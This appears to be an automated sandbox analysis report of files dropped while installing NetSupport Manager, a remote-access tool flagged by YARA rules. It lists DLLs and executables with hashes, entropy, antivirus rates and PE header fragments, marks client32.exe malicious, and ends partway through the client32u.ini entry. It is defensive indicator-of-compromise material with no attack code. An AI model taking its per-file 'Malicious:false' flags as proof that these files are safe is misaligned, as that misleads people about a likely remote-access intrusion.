                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-util-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):18624
                                                                                      Entropy (8bit):6.97908669425612
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:MGMWVghW/AvSx9YOCAs/nGfe4pBjSf6qy4X3WNArXVWQ4mWwiS21qnaj9RlS6VEX:iW2hWoSUA0GftpBjfHWbziS2lBRAkEX
                                                                                      MD5:2886C75F8B9D3EFDF315C44B52847AEE
                                                                                      SHA1:4FC75E39493B356F1F219798E3738DBC764281E4
                                                                                      SHA-256:3DB27D95689F936B4591EBAD18173AD07FAC07D69D68EEFF06DEE158599D731F
                                                                                      SHA-512:2931224106EEEA142664AEC9D1D5D028D15A14765BCE8674D34D67FC027F6FEFF3AF283F3D81B113E6EFCD42E6B4BD249E94E01C8F41B5211650F1775774B765
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......9+....@.............................9............ ...................<..............8............................................................................text...I........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-conio-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):19648
                                                                                      Entropy (8bit):6.97635016555389
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:UjcW2hWX7QA0GftpBju0dtTxZlBRAk9l3:yAwyi8or1RAO
                                                                                      MD5:3B038338C1EB179D8EEE3883CF42BC3E
                                                                                      SHA1:EA97CF2EE16EF2DF3766A40C6CE33C8BE5F683B2
                                                                                      SHA-256:C17786E9031062F56E4B205F394A795E11EF9367B922763DDF391F2ACAB2E979
                                                                                      SHA-512:1A6D8FC065237BF0DBBA18C777958522697B6BC2BE1B16586870A0C06178D65B521F66F522BF5636DF793E4AC8A2A3DE780B3C7062273A11F52A381EE851ECE6
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......Ts....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-convert-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):22720
                                                                                      Entropy (8bit):6.8330909328576315
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:sYNpdkKBcyNWVghW/77l9YOCAs/nGfe4pBjSfCKZWNArXVWQ4mWuqnajMHxxBNT5:zuyNW2hWD7QA0GftpBjLKNplI663U4v
                                                                                      MD5:5245F303E96166B8E625DD0A97E2D66A
                                                                                      SHA1:1C9ED748763F1FF5B14B8C791A4C29DE753A96AB
                                                                                      SHA-256:90A63611D9169A8CD7D030CD2B107B6E290E50E2BEBA6FA640A7497A8599AFF5
                                                                                      SHA-512:AF51F341670F925449E69C4B5F0A82F4FC4EB32913943272C32E3F3F18EE43B4AFB78C0D7D2F965C1ABE6A0F3A368616DD7A4FB74D83D22D1B69B405AEF1E043
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@...........@..........................................0...................<..............8............................................................................text............................... ..`.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-environment-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):19136
                                                                                      Entropy (8bit):6.969708578931716
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:sWVghW/cgbXH9YOCAs/nGfe4pBjSf4AKWNArXVWQ4mWvMHqnajMHxxBNT0662ONh:sW2hWUgbCA0GftpBjQGEMHlI663Uh
                                                                                      MD5:45C54A21261180410091CEFB23F6A5AE
                                                                                      SHA1:80EEE466D086D30C61EAEFC559D57E5E64F56F61
                                                                                      SHA-256:2B0FEA07DB507B7266346EAB3CA7EDE3821876AADC519DAF059B130B85640918
                                                                                      SHA-512:4962F85C94162FE2E35979FFF4E4B3752F322C61D801419769916F5E3A0E0C406284D95C22709C690212D4572EB688D9311A8F85F17C4F5D1A5A9F00E732808C
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......S....@............................."............ ...................<..............8............................................................................text...2........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-filesystem-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):20672
                                                                                      Entropy (8bit):6.979229086130751
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:kgq6nWm5C1W2hW7SUA0GftpBjAdlI663Um:k6nWm5CTqij66km
                                                                                      MD5:AB8734C2328A46E7E9583BEFEB7085A2
                                                                                      SHA1:B4686F07D1217C77EB013153E6FF55B34BE0AF65
                                                                                      SHA-256:921B7CF74744C4336F976DB6750921B2A0960E8AA11268457F5ED27C0E13B2C8
                                                                                      SHA-512:FD7E828F842DEABF2DCDCEA3E947DC3AA909C0B6A35C75FD64EDC63C359AB97020876E6C59AD335A2A166437FA65F57433F86C1C2FE10A34B90D15D8592FE911
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......X....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-heap-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):19648
                                                                                      Entropy (8bit):6.948212808065758
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:579Y17aFBRAWVghW/FgbXH9YOCAs/nGfe4pBjSfyWNArXVWQ4mWuA3qnaj9RlS6b:OtW2hWdgbCA0GftpBjrpA3lBRAkJ
                                                                                      MD5:39D81596A7308E978D67AD6FDCCDD331
                                                                                      SHA1:A0B2D43DD1C27D8244D11495E16D9F4F889E34C4
                                                                                      SHA-256:3D109FD01F6684414D8A1D0D2F5E6C5B4E24DE952A0695884744A6CBD44A8EC7
                                                                                      SHA-512:0EF6578DE4E6BA55EDA64691892D114E154D288C419D05D6CFF0EF4240118C20A4CE7F4174EEC1A33397C6CD0135D13798DC91CC97416351775F9ABF60FCAE76
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......4....@.......................................... ...................<..............8............................................................................text...&........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-locale-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):19136
                                                                                      Entropy (8bit):7.02455319040347
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:wWVghW/4gbXH9YOCAs/nGfe4pBjSfIMYgWNArXVWQ4mWu5BXqnajL1dHx3tKrSwZ:wW2hWwgbCA0GftpBjRMNBtlXBtFwuWd
                                                                                      MD5:E70D8FE9D21841202B4FD1CF55D37AC5
                                                                                      SHA1:FA62FB609D15C8AD3B5A12618BCC50F0D95CDEA3
                                                                                      SHA-256:E087F611B3659151DFB674728202944A7C0FE71710F280840E00A5C4B640632D
                                                                                      SHA-512:BD38BDF80DEFD4548580E7973D89ED29E1EDD401F202C367A3BA0020678206DA3ACC9B4436C9A122E4EFC32E80DBB39EB9BF08587E4FEBC8F14EC86A8993BCC8
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......./....@.............................e............ ...................<..............8............................................................................text...u........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-math-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):29376
                                                                                      Entropy (8bit):6.5989266511221745
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:K47isbM4Oe5grykfIgTmLSW2hWPgbCA0GftpBjF17cylBRAkV8:X1Mq5grxfInqH8iBgoRAz
                                                                                      MD5:D0D380AF839124368A96D6AA82C7C8AE
                                                                                      SHA1:E2AC42F829085E0E5BEEA29FCFF09E467810A777
                                                                                      SHA-256:06985D00BF4985024E95442702BBDB53C2127E99F16440424F3380A88883F1A5
                                                                                      SHA-512:DAF3997922E18C0BE088A15209C9F01CC1DDA90972A6AADCF76DE867B85D34483AD5E138E3FA321C7140BF8E455C2B908D0A4DB6A9E35011786398656B886479
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................@...............................P.......,....@..............................+...........@...............6...<..............8............................................................................text....,.......................... ..`.rsrc........@.......2..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-multibyte-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):26816
                                                                                      Entropy (8bit):6.632501498817798
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:my+Kr6aLPmIHJI6/CpG3t2G3t4odXLhW2hWjgbCA0GftpBjpCjzTZlXBtFwLd:mZKrZPmIHJI6NT8irCXDyx
                                                                                      MD5:809BC1010EAF714CD095189AF236CE2F
                                                                                      SHA1:10DBC383F7C49DE17FC50E830E3CB494CC873DD1
                                                                                      SHA-256:B52F2B9DE19D12B0E727E13E3DDE93009E487BFB2DD97FD23952C7080949D97E
                                                                                      SHA-512:F72EC10A0005E7023187EF6CCEDF2AF81D16174E628369FB834AF78E4EF2F3D44BF8B70E9B894ABC6791D7B9720C62C52A697FF0ADE0EDDDCAA52B6F14630D1D
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.....$...................@...............................P............@.............................. ...........@...............,...<..............8............................................................................text....".......$.................. ..`.rsrc........@.......(..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-private-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):73408
                                                                                      Entropy (8bit):5.811008103709619
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:nt2b2De5c4bFX2Jy2cvxXWpD9d3334BkZnkPgE79g:nw2De5c4bFX2Jy2cvxXWpD9d3334BkZ3
                                                                                      MD5:1DD5666125B8734E92B1041139FA6C37
                                                                                      SHA1:22E9566352E77AB15A917B45A86C0DC548431692
                                                                                      SHA-256:D0FF5F6BB94961D4C17F0709297A6B5A5FA323C9AC82F4FE27187912B4B13CF3
                                                                                      SHA-512:420B9184842ECD7969BF75F0D8A62569725624AE413C83EE3B6F26973318B4170287F657F2BE8DD3E7FC71264D69B2203E016D078615AD6E31E65033D5C59654
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................................................................@.............................8................................<..............8............................................................................text...H........................... ..`.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-process-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):19648
                                                                                      Entropy (8bit):6.961849079425489
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:pYTRQqjd7NWVghW/RmgbXH9YOCAs/nGfe4pBjSf1wjWNArXVWQ4mW4C0zA7qnajP:2KcW2hW5mgbCA0GftpBjLKlvQyURz8x
                                                                                      MD5:8F8A47617DFD829A63E3EC4AFF2718D9
                                                                                      SHA1:1D7DC26BB9C78C4499514FB3529B3478AECF7340
                                                                                      SHA-256:6D4A1AAD695A3451C2D3F564C7CC8D37192CD35539874DF6AE55E24847E51784
                                                                                      SHA-512:D3B96B1F80C20DE58A4D4179177E1C1C2B460719968FBA42E1BA694D890342AAAB5A8C67E7FFDD126B2FC6D6A7B2408952279D8926B14BF2DF11740483867821
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......\r....@.............................x............ ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-runtime-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):23232
                                                                                      Entropy (8bit):6.854338104703726
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:5b7hrKIW2hW6SUA0GftpBjoQt1TlI663UMp:5bNrKcziZzW66kMp
                                                                                      MD5:AE3FA6BF777B0429B825FB6B028F8A48
                                                                                      SHA1:B53DBFDB7C8DEAA9A05381F5AC2E596830039838
                                                                                      SHA-256:66B86ED0867FE22E80B9B737F3EE428BE71F5E98D36F774ABBF92E3AACA71BFB
                                                                                      SHA-512:1339E7CE01916573E7FDD71E331EEEE5E27B1DDD968CADFA6CBC73D58070B9C9F8D9515384AF004E5E015BD743C7A629EB0C62A6C0FA420D75B069096C5D1ECE
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@......@.....@..........................................0...................<..............8............................................................................text............................... ..`.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-stdio-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):24768
                                                                                      Entropy (8bit):6.784463110154403
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:vUFVhjW2hWcgbCA0GftpBjH95mnlvQyURz8te:szC8iEvU2Y
                                                                                      MD5:32D7B95B1BCE23DB9FBD0578053BA87F
                                                                                      SHA1:7E14A34AC667A087F66D576C65CD6FE6C1DFDD34
                                                                                      SHA-256:104A76B41CBD9A945DBA43A6FFA8C6DE99DB2105D4CE93A717729A9BD020F728
                                                                                      SHA-512:7DAD74A0E3820A8237BAB48F4962FE43E5B60B00F003A5DE563B4CF61EE206353C9689A639566DC009F41585B54B915FF04F014230F0F38416020E08C8A44CB4
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@.......h....@.............................a............0...............$...<..............8............................................................................text...q........................... ..`.rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-string-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):24768
                                                                                      Entropy (8bit):6.778007627268145
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:J6S5yguNvZ5VQgx3SbwA71IkF+w8iB66kP:Jl5yguNvZ5VQgx3SbwA71Itnb6kP
                                                                                      MD5:5E72659B38A2977984BBC23ED274F007
                                                                                      SHA1:EA622D608CC942BDB0FAD118C8060B60B2E985C9
                                                                                      SHA-256:44A4DB6080F6BDAE6151F60AE5DC420FAA3BE50902E88F8F14AD457DEC3FE4EA
                                                                                      SHA-512:ED3CB656A5F5AEE2CC04DD1F25B1390D52F3E85F0C7742ED0D473A117D2AC49E225A0CB324C31747D221617ABCD6A9200C16DD840284BB29155726A3AA749BB1
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@...........@..........................................0...............$...<..............8............................................................................text............................... ..`.rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-time-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):21184
                                                                                      Entropy (8bit):6.908629649625132
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:UzW2hWEgbCA0GftpBjJ6EKz3lvQyURz8X:y28i36bdvU2X
                                                                                      MD5:1FA7C2B81CDFD7ACE42A2A9A0781C946
                                                                                      SHA1:F5B7117D18A7335228829447E3ECCC7B806EF478
                                                                                      SHA-256:CAFDB772A1D7ACF0807478FDBA1E00FD101FC29C136547B37131F80D21DACFFD
                                                                                      SHA-512:339CDAF8DE445CF05BC201400D65BB9037EA7A3782BA76864842ADB6FBE5445D06863227DD774AB50E6F582B75886B302D5DD152AFF1825CF90E4F252398ACE0
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-utility-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):19136
                                                                                      Entropy (8bit):7.011995208399749
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:XY9fHQduPWVghW/EgbXH9YOCAs/nGfe4pBjSfbxaWNArXVWQ4mW0qnajMHxxBNTM:ef5W2hWcgbCA0GftpBjuYDlI663UD
                                                                                      MD5:D6ABF5C056D80592F8E2439E195D61AC
                                                                                      SHA1:33F793FD6A28673E766AD11EE1CF8EB8EF351BC0
                                                                                      SHA-256:8858D883D180CEA63E3BF4A3F5BC9E0F9FA16C9A35A84C4EFE65308CEA13A364
                                                                                      SHA-512:6678F17F2274AABBA5279BA40A0159FF8A54241D811845A48D845172F4AA6F7397CFD07BF2368299A613DF1F3FF12E06C0E62C26683DFB08D82122609C3A3F62
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......T....@.............................^............ ...................<..............8............................................................................text...n........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):551904
                                                                                      Entropy (8bit):5.925156666125814
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:YSQAix/cHSCXlYMPEvLrjORkDRZQxDChwuPJSKKu0T9ZNFvDvH:C23PE6RzDCnPJShu0/FvD
                                                                                      MD5:FE7D9DC26FF1615C13722E0F2DD3B815
                                                                                      SHA1:D36149AC1146404306224DFFD23AAFA748FBE5C0
                                                                                      SHA-256:09FDBC21AFDAAC95465BB2DD6F075C87443D7EC7F105DBDD61A515C25BC1C9FE
                                                                                      SHA-512:E371DC6D75A7A081E8C9F59CBB57133DD0D8B8A708F4FE0239D51CEF94B323468C3C6922BE0C3F896BA98289EB7C252CFEE1E42FA1211E2FFBDACC89DE2186DF
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~7...d...d...dQ..d...d...d...d..d...d..d...d...d)..d...df..d...d...d...d...d...d...d..d...d...d...dRich...d........PE..L.....oe.....................t.......w............@.......................................@..........................................@...................]...P...5...................................I..@...........(...8............................text............................... ..`.rdata..............................@..@.data....k.......&...~..............@....idata... ......."..................@....rsrc........@......................@..@.reloc..B=...P...>..................@..B........................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\clhook4.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):95872
                                                                                      Entropy (8bit):6.522984250421539
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:FjJGou6vXbHlVK4KGLyfTdvIZTkTavAiZQZ+oWDzFobYIWi5v2RviI:5Ja6vfK/GLYTq5kTatZEcJobwi5vGvr
                                                                                      MD5:38935DB0DD061269B7D79A1D287E750C
                                                                                      SHA1:B52E80F2421CEDF293EB8723FE32D8A91986228B
                                                                                      SHA-256:5A7E162064982B196F646DC3F4C4A5CC50858DA13BCFBA268F8BA0A6D9ABB741
                                                                                      SHA-512:2E8136C935D1CAD05CA1B9469238BFC3BCB3020A6F6E73949E8DA97F33133C8143119030210E58317DD484F7323FC197B6559B77055A76BCCA09232002A8E35A
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\clhook4.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.l..h?..h?..h?..i?..h?...?..h?...?..h?...?..h?...?..h?...?..h?...?..h?...?..h?...?..h?...?..h?Rich..h?........PE..d...m.hY.........." .....(...N......4...........................................................................................................(...............,....X.......... ....@...............................................@...............................text..."#.......$.................. ..h.rdata.......@.......(..............@..H.data....*...P.......8..............@....pdata..,............B..............@..H.edata...............J..............@..@INIT.................N.............. ....rsrc................R..............@..B.reloc...............V..............@..B................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):120288
                                                                                      Entropy (8bit):5.258524582048951
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:wfVZl6FhWr80/SqUr2pe/3NjHDHf/ckwGr2pe/k5XHDHf/ckVjp:w70hGaq0ee/3BjHdee/yXjHhjp
                                                                                      MD5:297EA82401ACBEAD6BA4B19880DF2B8C
                                                                                      SHA1:32664B5F0B27E26E75DBD97F1ED11397E4D1C9A6
                                                                                      SHA-256:72D9BD23541500A0F0FB657DA320A039894939500BE7D217C6627D05FCC5E629
                                                                                      SHA-512:C29951BED7CD6A6431BF15848DAFE3A438A05E1021EAC4B5A73585A6B39E7ECFB94567566D1641284533B80DBA3EF45070E933B98E472BF206E65CC5A6CE5B06
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.g.W.g.W.g.^...U.g.8...T.g.W.f.R.g.8..V.g.8...V.g.8...V.g.RichW.g.........PE..L...1.oe.....................r...... ........ ....@.......................................@.................................< ..<....0..Hm...........x...].......... ............................................... ...............................text............................... ..`.rdata..^.... ......................@..@.rsrc...Hm...0...n..................@..@.reloc..l............v..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):836
                                                                                      Entropy (8bit):5.502925006660024
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:nBhzEPmPT8FVXR8piBlnxOo31fXXfD+2ijr6cgEW3ZxAhU6L:nBtuK+VXypGlnxJ31fHfqj+cg3ZG
                                                                                      MD5:165A65E2FDE1870C85C463D021600B62
                                                                                      SHA1:16D38EAE2E83F532AF04117CEFF0D1DA80695076
                                                                                      SHA-256:8EF0F3A5FE3C2338E27BEFAAB18823135E22DA3462651FDA832D4C513F082BC6
